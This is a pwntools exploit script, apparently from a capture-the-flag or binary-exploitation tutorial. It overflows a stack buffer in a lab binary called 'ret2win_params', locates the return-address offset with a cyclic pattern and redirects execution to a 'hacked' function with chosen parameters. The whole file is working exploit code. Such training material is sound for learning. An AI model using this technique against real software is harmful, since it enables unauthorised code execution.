from pwn import *
# Allows easy swapping betwen local/remote/debug modes
def start(argv=[], *a, **kw):
if args.GDB: # Set GDBscript below
return gdb.debug([exe] + argv, gdbscript=gdbscript, *a, **kw)
elif args.REMOTE: # ('server', 'port')
return remote(sys.argv[1], sys.argv[2], *a, **kw)
else: # Run locally
return process([exe] + argv, *a, **kw)
def find_ip(payload):
# Launch process and send payload
p = process(exe)
p.sendlineafter(b':', payload)
# Wait for the process to crash
p.wait()
# Print out the address of EIP/RIP at the time of crashing
ip_offset = cyclic_find(p.corefile.pc) # x86
# ip_offset = cyclic_find(p.corefile.read(p.corefile.sp, 4)) # x64
info('located EIP/RIP offset at {a}'.format(a=ip_offset))
return ip_offset
# Specify your GDB script here for debugging
gdbscript = '''
init-pwndbg
continue
'''.format(**locals())
# Set up pwntools for the correct architecture
exe = './ret2win_params'
# This will automatically get context arch, bits, os etc
elf = context.binary = ELF(exe, checksec=False)
# Enable verbose logging so we can see exactly what is being sent (info/debug)
context.log_level = 'debug'
# ===========================================================
# EXPLOIT GOES HERE
# ===========================================================
# Pass in pattern_size, get back EIP/RIP offset
offset = find_ip(cyclic(200))
# Start program
io = start()
# Build the payload
payload = flat({
offset: [
# 32-bit the params follow the function
elf.functions.hacked,
0x0, # Return pointer - try changing to main() and step through with GDB!
0xdeadbeef, # Param_1
0xc0debabe, # Param_2
]
})
# Save the payload to file
write('payload', payload)
# Send the payload
io.sendlineafter(b':', payload)
# Get flag
io.interactive()